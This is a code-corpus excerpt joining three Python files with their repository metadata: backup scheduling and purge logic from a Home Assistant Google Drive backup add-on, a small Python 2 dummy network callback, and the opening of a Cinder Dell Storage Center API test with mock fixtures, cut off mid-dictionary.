elif self.dest.needsConfiguration():
next = None
elif not last_backup:
next = now - timedelta(minutes=1)
elif not timeofDay:
next = last_backup + timedelta(days=self.config.get(Setting.DAYS_BETWEEN_BACKUPS))
else:
newest_local: datetime = self.time.toLocal(last_backup)
time_that_day_local = datetime(newest_local.year, newest_local.month,
newest_local.day, timeofDay[0], timeofDay[1], tzinfo=self.time.local_tz)
if newest_local < time_that_day_local:
# Latest backup is before the backup time for that day
next = self.time.toUtc(time_that_day_local)
else:
# return the next backup after the delta
next = self.time.toUtc(
time_that_day_local + timedelta(days=self.config.get(Setting.DAYS_BETWEEN_BACKUPS)))
# Don't backup X minutes after startup, since that can put an unreasonable amount of strain on
# system just booting up.
if next is not None and next < now and now < self.info.backupCooldownTime() and not self.ignore_startup_delay:
self.waiting_for_startup = True
return self.info.backupCooldownTime()
else:
self.waiting_for_startup = False
return next
def nextBackup(self, now: datetime):
latest = max(filter(lambda s: not s.ignore(), self.backups.values()),
default=None, key=lambda s: s.date())
if latest:
latest = latest.date()
return self._nextBackup(now, latest)
async def sync(self, now: datetime):
if self.simulate_error is not None:
if self.simulate_error.startswith("test"):
raise Exception(self.simulate_error)
else:
raise SimulatedError(self.simulate_error)
await self._syncBackups([self.source, self.dest])
self.source.checkBeforeChanges()
self.dest.checkBeforeChanges()
if not self.dest.needsConfiguration():
if self.source.enabled():
await self._purge(self.source)
if self.dest.enabled():
await self._purge(self.dest)
# Delete any "ignored" backups that have expired
if (self.config.get(Setting.IGNORE_OTHER_BACKUPS) or self.config.get(Setting.IGNORE_UPGRADE_BACKUPS)) and self.config.get(Setting.DELETE_IGNORED_AFTER_DAYS) > 0:
cutoff = now - timedelta(days=self.config.get(Setting.DELETE_IGNORED_AFTER_DAYS))
delete = []
for backup in self.backups.values():
if backup.ignore() and backup.date() < cutoff:
delete.append(backup)
for backup in delete:
await self.deleteBackup(backup, self.source)
self._handleBackupDetails()
next_backup = self.nextBackup(now)
if next_backup and now >= next_backup and self.source.enabled() and not self.dest.needsConfiguration():
if self.config.get(Setting.DELETE_BEFORE_NEW_BACKUP):
await self._purge(self.source, pre_purge=True)
await self.createBackup(CreateOptions(now, self.config.get(Setting.BACKUP_NAME)))
await self._purge(self.source)
self._handleBackupDetails()
if self.dest.enabled() and self.dest.upload():
# get the backups we should upload
uploads = []
for backup in self.backups.values():
if backup.getSource(self.source.name()) is not None and backup.getSource(self.source.name()).uploadable() and backup.getSource(self.dest.name()) is None and not backup.ignore():
uploads.append(backup)
uploads.sort(key=lambda s: s.date())
uploads.reverse()
for upload in uploads:
# only upload if doing so won't result in it being deleted next
dummy = DummyBackup(
"", upload.date(), self.dest.name(), "dummy_slug_name")
proposed = list(self.backups.values())
proposed.append(dummy)
if self._nextPurge(self.dest, proposed) != dummy:
if self.config.get(Setting.DELETE_BEFORE_NEW_BACKUP):
await self._purge(self.dest, pre_purge=True)
upload.addSource(await self.dest.save(upload, await self.source.read(upload)))
await self._purge(self.dest)
self._handleBackupDetails()
else:
break
if self.config.get(Setting.DELETE_AFTER_UPLOAD):
await self._purge(self.source)
self._handleBackupDetails()
self.source.postSync()
self.dest.postSync()
self._data_cache.saveIfDirty()
def isWorkingThroughUpload(self):
return self.dest.isWorking()
async def createBackup(self, options):
if not self.source.enabled():
return
self.estimator.refresh()
self.estimator.checkSpace(list(self.backups.values()))
created = await self.source.create(options)
backup = Backup(created)
self.backups[backup.slug()] = backup
async def deleteBackup(self, backup, source):
if not backup.getSource(source.name()):
return
slug = backup.slug()
await source.delete(backup)
backup.removeSource(source.name())
if backup.isDeleted():
del self.backups[slug]
def getNextPurges(self):
purges = {}
for source in [self.source, self.dest]:
purges[source.name()] = self._nextPurge(
source, self.backups.values(), findNext=True)
return purges
def _parseTimeOfDay(self) -> Optional[Tuple[int, int]]:
from_config = self.config.get(Setting.BACKUP_TIME_OF_DAY)
if len(from_config) == 0:
return None
parts = from_config.split(":")
if len(parts) != 2:
return None
try:
hour: int = int(parts[0])
minute: int = int(parts[1])
if hour < 0 or minute < 0 or hour > 23 or minute > 59:
return None
return (hour, minute)
except ValueError:
# Parse error
return None
async def _syncBackups(self, sources: List[BackupSource]):
for source in sources:
if source.enabled():
from_source: Dict[str, AbstractBackup] = await source.get()
else:
from_source: Dict[str, AbstractBackup] = {}
for backup in from_source.values():
if backup.slug() not in self.backups:
self.backups[backup.slug()] = Backup(backup)
else:
self.backups[backup.slug()].addSource(backup)
for backup in list(self.backups.values()):
if backup.slug() not in from_source:
slug = backup.slug()
backup.removeSource(source.name())
if backup.isDeleted():
del self.backups[slug]
self.firstSync = False
def _buildDeleteScheme(self, source, findNext=False):
count = source.maxCount()
if findNext:
count -= 1
if source == self.source and self.config.get(Setting.DELETE_AFTER_UPLOAD):
return DeleteAfterUploadScheme(source.name(), [self.dest.name()])
elif self.generational_config:
return GenerationalScheme(
self.time, self.generational_config, count=count)
else:
return OldestScheme(count=count)
def _buildNamingScheme(self):
source = max(filter(BackupSource.enabled, self.allSources()), key=BackupSource.maxCount)
return self._buildDeleteScheme(source)
def _handleBackupDetails(self):
self._buildNamingScheme().handleNaming(self.backups.values())
def _nextPurge(self, source: BackupSource, backups, findNext=False):
"""
Given a list of backups, decides if one should be purged.
"""
if not source.enabled() or len(backups) == 0:
return None
if source.maxCount() == 0 and not self.config.get(Setting.DELETE_AFTER_UPLOAD):
return None
scheme = self._buildDeleteScheme(source, findNext=findNext)
consider_purging = []
for backup in backups:
source_backup = backup.getSource(source.name())
if source_backup is not None and source_backup.considerForPurge() and not backup.ignore():
consider_purging.append(backup)
if len(consider_purging) == 0:
return None
return scheme.getOldest(consider_purging)
async def _purge(self, source: BackupSource, pre_purge=False):
while True:
purge = self._getPurgeList(source, pre_purge)
if len(purge) <= 0:
return
if len(purge) > 1 and (self.config.get(Setting.CONFIRM_MULTIPLE_DELETES) and not self.info.isPermitMultipleDeletes()):
raise DeleteMutlipleBackupsError(self._getPurgeStats())
await self.deleteBackup(purge[0], source)
def _getPurgeStats(self):
ret = {}
for source in [self.source, self.dest]:
ret[source.name()] = len(self._getPurgeList(source))
return ret
def _getPurgeList(self, source: BackupSource, pre_purge=False):
if not source.enabled():
return []
candidates = list(self.backups.values())
purges = []
while True:
next_purge = self._nextPurge(source, candidates, findNext=pre_purge)
if next_purge is None:
return purges
else:
purges.append(next_purge)
candidates.remove(next_purge)
| 38.662921 | 194 | 0.596338 | [
"MIT"
] | voxipbx/hassio-addons | hassio-google-drive-backup/backup/model/model.py | 13,764 | Python |
# -*- coding: utf8 -*-
'''
Dummy callback object definition
@author: Luis Barrios Hernández
@version: 1.0
'''
from network.manager.networkManager import NetworkCallback
class DummyCallback(NetworkCallback):
def processPacket(self, packet):
print packet._serialize()
| 21.538462 | 58 | 0.739286 | [
"Apache-2.0"
] | lbarriosh/cygnus-cloud | src/Infraestructura/network/tests/dummyCallback.py | 281 | Python |
# Copyright (c) 2015 Dell Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ddt
import mock
import requests
from requests import models
import uuid
from cinder import context
from cinder import exception
from cinder import test
from cinder.volume.drivers.dell import dell_storagecenter_api
# We patch these here as they are used by every test to keep
# from trying to contact a Dell Storage Center.
@ddt.ddt
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'__init__',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'open_connection')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'close_connection')
class DellSCSanAPITestCase(test.TestCase):
"""DellSCSanAPITestCase
Class to test the Storage Center API using Mock.
"""
SC = {u'IPv6ManagementIPPrefix': 128,
u'connectionError': u'',
u'instanceId': u'64702',
u'scSerialNumber': 64702,
u'dataProgressionRunning': False,
u'hostOrIpAddress': u'192.168.0.80',
u'userConnected': True,
u'portsBalanced': True,
u'managementIp': u'192.168.0.80',
u'version': u'6.5.1.269',
u'location': u'',
u'objectType': u'StorageCenter',
u'instanceName': u'Storage Center 64702',
u'statusMessage': u'',
u'status': u'Up',
u'flashOptimizedConfigured': False,
u'connected': True,
u'operationMode': u'Normal',
u'userName': u'Admin',
u'nonFlashOptimizedConfigured': True,
u'name': u'Storage Center 64702',
u'scName': u'Storage Center 64702',
u'notes': u'',
u'serialNumber': 64702,
u'raidRebalanceRunning': False,
u'userPasswordExpired': False,
u'contact': u'',
u'IPv6ManagementIP': u'::'}
VOLUME = {u'instanceId': u'64702.3494',
u'scSerialNumber': 64702,
u'replicationSource': False,
u'liveVolume': False,
u'vpdId': 3496,
u'objectType': u'ScVolume',
u'index': 3494,
u'volumeFolderPath': u'devstackvol/fcvm/',
u'hostCacheEnabled': False,
u'usedByLegacyFluidFsNasVolume': False,
u'inRecycleBin': False,
u'volumeFolderIndex': 17,
u'instanceName': u'volume-37883deb-85cd-426a-9a98-62eaad8671ea',
u'statusMessage': u'',
u'status': u'Up',
u'storageType': {u'instanceId': u'64702.1',
u'instanceName': u'Assigned - Redundant - 2 MB',
u'objectType': u'ScStorageType'},
u'cmmDestination': False,
u'replicationDestination': False,
u'volumeFolder': {u'instanceId': u'64702.17',
u'instanceName': u'fcvm',
u'objectType': u'ScVolumeFolder'},
u'deviceId': u'6000d31000fcbe000000000000000da8',
u'active': True,
u'portableVolumeDestination': False,
u'deleteAllowed': True,
u'name': u'volume-37883deb-85cd-426a-9a98-62eaad8671ea',
u'scName': u'Storage Center 64702',
u'secureDataUsed': False,
u'serialNumber': u'0000fcbe-00000da8',
u'replayAllowed': True,
u'flashOptimized': False,
u'configuredSize': u'1.073741824E9 Bytes',
u'mapped': False,
u'cmmSource': False}
VOLUME_LIST = [{u'instanceId': u'64702.3494',
u'scSerialNumber': 64702,
u'replicationSource': False,
u'liveVolume': False,
u'vpdId': 3496,
u'objectType': u'ScVolume',
u'index': 3494,
u'volumeFolderPath': u'devstackvol/fcvm/',
u'hostCacheEnabled': False,
u'usedByLegacyFluidFsNasVolume': False,
u'inRecycleBin': False,
u'volumeFolderIndex': 17,
u'instanceName':
u'volume-37883deb-85cd-426a-9a98-62eaad8671ea',
u'statusMessage': u'',
u'status': u'Up',
u'storageType': {u'instanceId': u'64702.1',
u'instanceName':
u'Assigned - Redundant - 2 MB',
u'objectType': u'ScStorageType'},
u'cmmDestination': False,
u'replicationDestination': False,
u'volumeFolder': {u'instanceId': u'64702.17',
u'instanceName': u'fcvm',
u'objectType': u'ScVolumeFolder'},
u'deviceId': u'6000d31000fcbe000000000000000da8',
u'active': True,
u'portableVolumeDestination': False,
u'deleteAllowed': True,
u'name': u'volume-37883deb-85cd-426a-9a98-62eaad8671ea',
u'scName': u'Storage Center 64702',
u'secureDataUsed': False,
u'serialNumber': u'0000fcbe-00000da8',
u'replayAllowed': True,
u'flashOptimized': False,
u'configuredSize': u'1.073741824E9 Bytes',
u'mapped': False,
u'cmmSource': False}]
# Volume list that contains multiple volumes
VOLUME_LIST_MULTI_VOLS = [
{u'instanceId': u'64702.3494',
u'scSerialNumber': 64702,
u'replicationSource': False,
u'liveVolume': False,
u'vpdId': 3496,
u'objectType': u'ScVolume',
u'index': 3494,
u'volumeFolderPath': u'devstackvol/fcvm/',
u'hostCacheEnabled': False,
u'usedByLegacyFluidFsNasVolume': False,
u'inRecycleBin': False,
u'volumeFolderIndex': 17,
u'instanceName':
u'volume-37883deb-85cd-426a-9a98-62eaad8671ea',
u'statusMessage': u'',
u'status': u'Up',
u'storageType': {u'instanceId': u'64702.1',
u'instanceName':
u'Assigned - Redundant - 2 MB',
u'objectType': u'ScStorageType'},
u'cmmDestination': False,
u'replicationDestination': False,
u'volumeFolder': {u'instanceId': u'64702.17',
u'instanceName': u'fcvm',
u'objectType': u'ScVolumeFolder'},
u'deviceId': u'6000d31000fcbe000000000000000da8',
u'active': True,
u'portableVolumeDestination': False,
u'deleteAllowed': True,
u'name': u'volume-37883deb-85cd-426a-9a98-62eaad8671ea',
u'scName': u'Storage Center 64702',
u'secureDataUsed': False,
u'serialNumber': u'0000fcbe-00000da8',
u'replayAllowed': True,
u'flashOptimized': False,
u'configuredSize': u'1.073741824E9 Bytes',
u'mapped': False,
u'cmmSource': False},
{u'instanceId': u'64702.3495',
u'scSerialNumber': 64702,
u'replicationSource': False,
u'liveVolume': False,
u'vpdId': 3496,
u'objectType': u'ScVolume',
u'index': 3495,
u'volumeFolderPath': u'devstackvol/fcvm/',
u'hostCacheEnabled': False,
u'usedByLegacyFluidFsNasVolume': False,
u'inRecycleBin': False,
u'volumeFolderIndex': 17,
u'instanceName':
u'volume-37883deb-85cd-426a-9a98-62eaad8671ea',
u'statusMessage': u'',
u'status': u'Up',
u'storageType': {u'instanceId': u'64702.1',
u'instanceName':
u'Assigned - Redundant - 2 MB',
u'objectType': u'ScStorageType'},
u'cmmDestination': False,
u'replicationDestination': False,
u'volumeFolder': {u'instanceId': u'64702.17',
u'instanceName': u'fcvm',
u'objectType': u'ScVolumeFolder'},
u'deviceId': u'6000d31000fcbe000000000000000da9',
u'active': True,
u'portableVolumeDestination': False,
u'deleteAllowed': True,
u'name': u'volume-37883deb-85cd-426a-9a98-62eaad8671ea',
u'scName': u'Storage Center 64702',
u'secureDataUsed': False,
u'serialNumber': u'0000fcbe-00000da8',
u'replayAllowed': True,
u'flashOptimized': False,
u'configuredSize': u'1.073741824E9 Bytes',
u'mapped': False,
u'cmmSource': False}]
VOLUME_CONFIG = \
{u'instanceId': u'64702.3494',
u'scSerialNumber': 64702,
u'maximumSiblingCount': 100,
u'writeCacheStatus': u'Up',
u'objectType': u'ScVolumeConfiguration',
u'currentSiblingConfiguredSize': u'2.147483648E9 Bytes',
u'compressionPaused': False,
u'enforceConsumptionLimit': False,
u'volumeSpaceConsumptionLimit': u'2.147483648E9 Bytes',
u'readCacheEnabled': True,
u'writeCacheEnabled': True,
u'instanceName': u'volume-ff9589d3-2d41-48d5-9ef5-2713a875e85b',
u'dateModified': u'04/03/2015 12:01:08 AM',
u'modifyUser': u'Admin',
u'replayExpirationPaused': False,
u'currentSiblingCount': 1,
u'replayCreationPaused': False,
u'replayProfileList': [{u'instanceId': u'64702.2',
u'instanceName': u'Daily',
u'objectType': u'ScReplayProfile'}],
u'dateCreated': u'04/04/2014 03:54:26 AM',
u'volume': {u'instanceId': u'64702.3494',
u'instanceName':
u'volume-37883deb-85cd-426a-9a98-62eaad8671ea',
u'objectType': u'ScVolume'},
u'controller': {u'instanceId': u'64702.64703',
u'instanceName': u'SN 64703',
u'objectType': u'ScController'},
u'coalesceIntoActive': False,
u'createUser': u'Admin',
u'importToLowestTier': False,
u'readCacheStatus': u'Up',
u'maximumSiblingConfiguredSpace': u'5.49755813888E14 Bytes',
u'storageProfile': {u'instanceId': u'64702.1',
u'instanceName': u'Recommended',
u'objectType': u'ScStorageProfile'},
u'scName': u'Storage Center 64702',
u'notes': u'',
u'diskFolder': {u'instanceId': u'64702.3',
u'instanceName': u'Assigned',
u'objectType': u'ScDiskFolder'},
u'openVmsUniqueDiskId': 48,
u'compressionEnabled': False}
INACTIVE_VOLUME = \
{u'instanceId': u'64702.3494',
u'scSerialNumber': 64702,
u'replicationSource': False,
u'liveVolume': False,
u'vpdId': 3496,
u'objectType': u'ScVolume',
u'index': 3494,
u'volumeFolderPath': u'devstackvol/fcvm/',
u'hostCacheEnabled': False,
u'usedByLegacyFluidFsNasVolume': False,
u'inRecycleBin': False,
u'volumeFolderIndex': 17,
u'instanceName': u'volume-37883deb-85cd-426a-9a98-62eaad8671ea',
u'statusMessage': u'',
u'status': u'Up',
u'storageType': {u'instanceId': u'64702.1',
u'instanceName': u'Assigned - Redundant - 2 MB',
u'objectType': u'ScStorageType'},
u'cmmDestination': False,
u'replicationDestination': False,
u'volumeFolder': {u'instanceId': u'64702.17',
u'instanceName': u'fcvm',
u'objectType': u'ScVolumeFolder'},
u'deviceId': u'6000d31000fcbe000000000000000da8',
u'active': False,
u'portableVolumeDestination': False,
u'deleteAllowed': True,
u'name': u'volume-37883deb-85cd-426a-9a98-62eaad8671ea',
u'scName': u'Storage Center 64702',
u'secureDataUsed': False,
u'serialNumber': u'0000fcbe-00000da8',
u'replayAllowed': True,
u'flashOptimized': False,
u'configuredSize': u'1.073741824E9 Bytes',
u'mapped': False,
u'cmmSource': False}
SCSERVER = {u'scName': u'Storage Center 64702',
u'volumeCount': 0,
u'removeHbasAllowed': True,
u'legacyFluidFs': False,
u'serverFolderIndex': 4,
u'alertOnConnectivity': True,
u'objectType': u'ScPhysicalServer',
u'instanceName': u'Server_21000024ff30441d',
u'instanceId': u'64702.47',
u'serverFolderPath': u'devstacksrv/',
u'portType': [u'FibreChannel'],
u'type': u'Physical',
u'statusMessage': u'Only 5 of 6 expected paths are up',
u'status': u'Degraded',
u'scSerialNumber': 64702,
u'serverFolder': {u'instanceId': u'64702.4',
u'instanceName': u'devstacksrv',
u'objectType': u'ScServerFolder'},
u'parentIndex': 0,
u'connectivity': u'Partial',
u'hostCacheIndex': 0,
u'deleteAllowed': True,
u'pathCount': 5,
u'name': u'Server_21000024ff30441d',
u'hbaPresent': True,
u'hbaCount': 2,
u'notes': u'Created by Dell Cinder Driver',
u'mapped': False,
u'operatingSystem': {u'instanceId': u'64702.38',
u'instanceName': u'Red Hat Linux 6.x',
u'objectType': u'ScServerOperatingSystem'}
}
# ScServer where deletedAllowed=False (not allowed to be deleted)
SCSERVER_NO_DEL = {u'scName': u'Storage Center 64702',
u'volumeCount': 0,
u'removeHbasAllowed': True,
u'legacyFluidFs': False,
u'serverFolderIndex': 4,
u'alertOnConnectivity': True,
u'objectType': u'ScPhysicalServer',
u'instanceName': u'Server_21000024ff30441d',
u'instanceId': u'64702.47',
u'serverFolderPath': u'devstacksrv/',
u'portType': [u'FibreChannel'],
u'type': u'Physical',
u'statusMessage': u'Only 5 of 6 expected paths are up',
u'status': u'Degraded',
u'scSerialNumber': 64702,
u'serverFolder': {u'instanceId': u'64702.4',
u'instanceName': u'devstacksrv',
u'objectType': u'ScServerFolder'},
u'parentIndex': 0,
u'connectivity': u'Partial',
u'hostCacheIndex': 0,
u'deleteAllowed': False,
u'pathCount': 5,
u'name': u'Server_21000024ff30441d',
u'hbaPresent': True,
u'hbaCount': 2,
u'notes': u'Created by Dell Cinder Driver',
u'mapped': False,
u'operatingSystem':
{u'instanceId': u'64702.38',
u'instanceName': u'Red Hat Linux 6.x',
u'objectType': u'ScServerOperatingSystem'}
}
SCSERVERS = [{u'scName': u'Storage Center 64702',
u'volumeCount': 5,
u'removeHbasAllowed': True,
u'legacyFluidFs': False,
u'serverFolderIndex': 0,
u'alertOnConnectivity': True,
u'objectType': u'ScPhysicalServer',
u'instanceName': u'openstack4',
u'instanceId': u'64702.1',
u'serverFolderPath': u'',
u'portType': [u'Iscsi'],
u'type': u'Physical',
u'statusMessage': u'',
u'status': u'Up',
u'scSerialNumber': 64702,
u'serverFolder': {u'instanceId': u'64702.0',
u'instanceName': u'Servers',
u'objectType': u'ScServerFolder'},
u'parentIndex': 0,
u'connectivity': u'Up',
u'hostCacheIndex': 0,
u'deleteAllowed': True,
u'pathCount': 0,
u'name': u'openstack4',
u'hbaPresent': True,
u'hbaCount': 1,
u'notes': u'',
u'mapped': True,
u'operatingSystem':
{u'instanceId': u'64702.3',
u'instanceName': u'Other Multipath',
u'objectType': u'ScServerOperatingSystem'}},
{u'scName': u'Storage Center 64702',
u'volumeCount': 1,
u'removeHbasAllowed': True,
u'legacyFluidFs': False,
u'serverFolderIndex': 0,
u'alertOnConnectivity': True,
u'objectType': u'ScPhysicalServer',
u'instanceName': u'openstack5',
u'instanceId': u'64702.2',
u'serverFolderPath': u'',
u'portType': [u'Iscsi'],
u'type': u'Physical',
u'statusMessage': u'',
u'status': u'Up',
u'scSerialNumber': 64702,
u'serverFolder': {u'instanceId': u'64702.0',
u'instanceName': u'Servers',
u'objectType': u'ScServerFolder'},
u'parentIndex': 0,
u'connectivity': u'Up',
u'hostCacheIndex': 0,
u'deleteAllowed': True,
u'pathCount': 0, u'name': u'openstack5',
u'hbaPresent': True,
u'hbaCount': 1,
u'notes': u'',
u'mapped': True,
u'operatingSystem':
{u'instanceId': u'64702.2',
u'instanceName': u'Other Singlepath',
u'objectType': u'ScServerOperatingSystem'}}]
# ScServers list where status = Down
SCSERVERS_DOWN = \
[{u'scName': u'Storage Center 64702',
u'volumeCount': 5,
u'removeHbasAllowed': True,
u'legacyFluidFs': False,
u'serverFolderIndex': 0,
u'alertOnConnectivity': True,
u'objectType': u'ScPhysicalServer',
u'instanceName': u'openstack4',
u'instanceId': u'64702.1',
u'serverFolderPath': u'',
u'portType': [u'Iscsi'],
u'type': u'Physical',
u'statusMessage': u'',
u'status': u'Down',
u'scSerialNumber': 64702,
u'serverFolder': {u'instanceId': u'64702.0',
u'instanceName': u'Servers',
u'objectType': u'ScServerFolder'},
u'parentIndex': 0,
u'connectivity': u'Up',
u'hostCacheIndex': 0,
u'deleteAllowed': True,
u'pathCount': 0,
u'name': u'openstack4',
u'hbaPresent': True,
u'hbaCount': 1,
u'notes': u'',
u'mapped': True,
u'operatingSystem':
{u'instanceId': u'64702.3',
u'instanceName': u'Other Multipath',
u'objectType': u'ScServerOperatingSystem'}}]
MAP_PROFILE = {u'instanceId': u'64702.2941',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'controller': {u'instanceId': u'64702.64703',
u'instanceName': u'SN 64703',
u'objectType': u'ScController'},
u'lunUsed': [1],
u'server': {u'instanceId': u'64702.47',
u'instanceName': u'Server_21000024ff30441d',
u'objectType': u'ScPhysicalServer'},
u'volume':
{u'instanceId': u'64702.6025',
u'instanceName': u'Server_21000024ff30441d Test Vol',
u'objectType': u'ScVolume'},
u'connectivity': u'Up',
u'readOnly': False,
u'objectType': u'ScMappingProfile',
u'hostCache': False,
u'mappedVia': u'Server',
u'mapCount': 3,
u'instanceName': u'6025-47',
u'lunRequested': u'N/A'}
MAP_PROFILES = [MAP_PROFILE]
MAPPINGS = [{u'profile': {u'instanceId': u'64702.104',
u'instanceName': u'92-30',
u'objectType': u'ScMappingProfile'},
u'status': u'Down',
u'statusMessage': u'',
u'instanceId': u'64702.969.64702',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'controller': {u'instanceId': u'64702.64702',
u'instanceName': u'SN 64702',
u'objectType': u'ScController'},
u'server': {u'instanceId': u'64702.30',
u'instanceName':
u'Server_iqn.1993-08.org.debian:01:3776df826e4f',
u'objectType': u'ScPhysicalServer'},
u'volume': {u'instanceId': u'64702.92',
u'instanceName':
u'volume-74a21934-60ad-4cf2-b89b-1f0dda309ddf',
u'objectType': u'ScVolume'},
u'readOnly': False,
u'lun': 1,
u'lunUsed': [1],
u'serverHba': {u'instanceId': u'64702.3454975614',
u'instanceName':
u'iqn.1993-08.org.debian:01:3776df826e4f',
u'objectType': u'ScServerHba'},
u'path': {u'instanceId': u'64702.64702.64702.31.8',
u'instanceName':
u'iqn.1993-08.org.debian:'
'01:3776df826e4f-5000D31000FCBE43',
u'objectType': u'ScServerHbaPath'},
u'controllerPort': {u'instanceId':
u'64702.5764839588723736131.91',
u'instanceName': u'5000D31000FCBE43',
u'objectType': u'ScControllerPort'},
u'instanceName': u'64702-969',
u'transport': u'Iscsi',
u'objectType': u'ScMapping'}]
# Multiple mappings to test find_iscsi_properties with multiple portals
MAPPINGS_MULTI_PORTAL = \
[{u'profile': {u'instanceId': u'64702.104',
u'instanceName': u'92-30',
u'objectType': u'ScMappingProfile'},
u'status': u'Down',
u'statusMessage': u'',
u'instanceId': u'64702.969.64702',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'controller': {u'instanceId': u'64702.64702',
u'instanceName': u'SN 64702',
u'objectType': u'ScController'},
u'server': {u'instanceId': u'64702.30',
u'instanceName':
u'Server_iqn.1993-08.org.debian:01:3776df826e4f',
u'objectType': u'ScPhysicalServer'},
u'volume': {u'instanceId': u'64702.92',
u'instanceName':
u'volume-74a21934-60ad-4cf2-b89b-1f0dda309ddf',
u'objectType': u'ScVolume'},
u'readOnly': False,
u'lun': 1,
u'lunUsed': [1],
u'serverHba': {u'instanceId': u'64702.3454975614',
u'instanceName':
u'iqn.1993-08.org.debian:01:3776df826e4f',
u'objectType': u'ScServerHba'},
u'path': {u'instanceId': u'64702.64702.64702.31.8',
u'instanceName':
u'iqn.1993-08.org.debian:'
'01:3776df826e4f-5000D31000FCBE43',
u'objectType': u'ScServerHbaPath'},
u'controllerPort': {u'instanceId':
u'64702.5764839588723736131.91',
u'instanceName': u'5000D31000FCBE43',
u'objectType': u'ScControllerPort'},
u'instanceName': u'64702-969',
u'transport': u'Iscsi',
u'objectType': u'ScMapping'},
{u'profile': {u'instanceId': u'64702.104',
u'instanceName': u'92-30',
u'objectType': u'ScMappingProfile'},
u'status': u'Down',
u'statusMessage': u'',
u'instanceId': u'64702.969.64702',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'controller': {u'instanceId': u'64702.64702',
u'instanceName': u'SN 64702',
u'objectType': u'ScController'},
u'server': {u'instanceId': u'64702.30',
u'instanceName':
u'Server_iqn.1993-08.org.debian:01:3776df826e4f',
u'objectType': u'ScPhysicalServer'},
u'volume': {u'instanceId': u'64702.92',
u'instanceName':
u'volume-74a21934-60ad-4cf2-b89b-1f0dda309ddf',
u'objectType': u'ScVolume'},
u'readOnly': False,
u'lun': 1,
u'lunUsed': [1],
u'serverHba': {u'instanceId': u'64702.3454975614',
u'instanceName':
u'iqn.1993-08.org.debian:01:3776df826e4f',
u'objectType': u'ScServerHba'},
u'path': {u'instanceId': u'64702.64702.64702.31.8',
u'instanceName':
u'iqn.1993-08.org.debian:'
'01:3776df826e4f-5000D31000FCBE43',
u'objectType': u'ScServerHbaPath'},
u'controllerPort': {u'instanceId':
u'64702.5764839588723736131.91',
u'instanceName': u'5000D31000FCBE43',
u'objectType': u'ScControllerPort'},
u'instanceName': u'64702-969',
u'transport': u'Iscsi',
u'objectType': u'ScMapping'}]
MAPPINGS_READ_ONLY = \
[{u'profile': {u'instanceId': u'64702.104',
u'instanceName': u'92-30',
u'objectType': u'ScMappingProfile'},
u'status': u'Down',
u'statusMessage': u'',
u'instanceId': u'64702.969.64702',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'controller': {u'instanceId': u'64702.64702',
u'instanceName': u'SN 64702',
u'objectType': u'ScController'},
u'server': {u'instanceId': u'64702.30',
u'instanceName':
u'Server_iqn.1993-08.org.debian:01:3776df826e4f',
u'objectType': u'ScPhysicalServer'},
u'volume': {u'instanceId': u'64702.92',
u'instanceName':
u'volume-74a21934-60ad-4cf2-b89b-1f0dda309ddf',
u'objectType': u'ScVolume'},
u'readOnly': True,
u'lun': 1,
u'lunUsed': [1],
u'serverHba': {u'instanceId': u'64702.3454975614',
u'instanceName':
u'iqn.1993-08.org.debian:01:3776df826e4f',
u'objectType': u'ScServerHba'},
u'path': {u'instanceId': u'64702.64702.64702.31.8',
u'instanceName':
u'iqn.1993-08.org.debian:'
'01:3776df826e4f-5000D31000FCBE43',
u'objectType': u'ScServerHbaPath'},
u'controllerPort': {u'instanceId':
u'64702.5764839588723736131.91',
u'instanceName':
u'5000D31000FCBE43',
u'objectType': u'ScControllerPort'},
u'instanceName': u'64702-969',
u'transport': u'Iscsi',
u'objectType': u'ScMapping'}]
FC_MAPPINGS = [{u'profile': {u'instanceId': u'64702.2941',
u'instanceName': u'6025-47',
u'objectType': u'ScMappingProfile'},
u'status': u'Up',
u'statusMessage': u'',
u'instanceId': u'64702.7639.64702',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'controller': {u'instanceId': u'64702.64703',
u'instanceName': u'SN 64703',
u'objectType': u'ScController'},
u'server': {u'instanceId': u'64702.47',
u'instanceName': u'Server_21000024ff30441d',
u'objectType': u'ScPhysicalServer'},
u'volume': {u'instanceId': u'64702.6025',
u'instanceName':
u'Server_21000024ff30441d Test Vol',
u'objectType': u'ScVolume'},
u'readOnly': False,
u'lun': 1,
u'serverHba': {u'instanceId': u'64702.3282218607',
u'instanceName': u'21000024FF30441C',
u'objectType': u'ScServerHba'},
u'path': {u'instanceId': u'64702.64702.64703.27.73',
u'instanceName':
u'21000024FF30441C-5000D31000FCBE36',
u'objectType': u'ScServerHbaPath'},
u'controllerPort':
{u'instanceId': u'64702.5764839588723736118.50',
u'instanceName': u'5000D31000FCBE36',
u'objectType': u'ScControllerPort'},
u'instanceName': u'64702-7639',
u'transport': u'FibreChannel',
u'objectType': u'ScMapping'},
{u'profile': {u'instanceId': u'64702.2941',
u'instanceName': u'6025-47',
u'objectType': u'ScMappingProfile'},
u'status': u'Up',
u'statusMessage': u'',
u'instanceId': u'64702.7640.64702',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'controller': {u'instanceId': u'64702.64703',
u'instanceName': u'SN 64703',
u'objectType': u'ScController'},
u'server': {u'instanceId': u'64702.47',
u'instanceName': u'Server_21000024ff30441d',
u'objectType': u'ScPhysicalServer'},
u'volume':
{u'instanceId': u'64702.6025',
u'instanceName': u'Server_21000024ff30441d Test Vol',
u'objectType': u'ScVolume'},
u'readOnly': False,
u'lun': 1,
u'serverHba': {u'instanceId': u'64702.3282218606',
u'instanceName': u'21000024FF30441D',
u'objectType': u'ScServerHba'},
u'path':
{u'instanceId': u'64702.64702.64703.27.78',
u'instanceName': u'21000024FF30441D-5000D31000FCBE36',
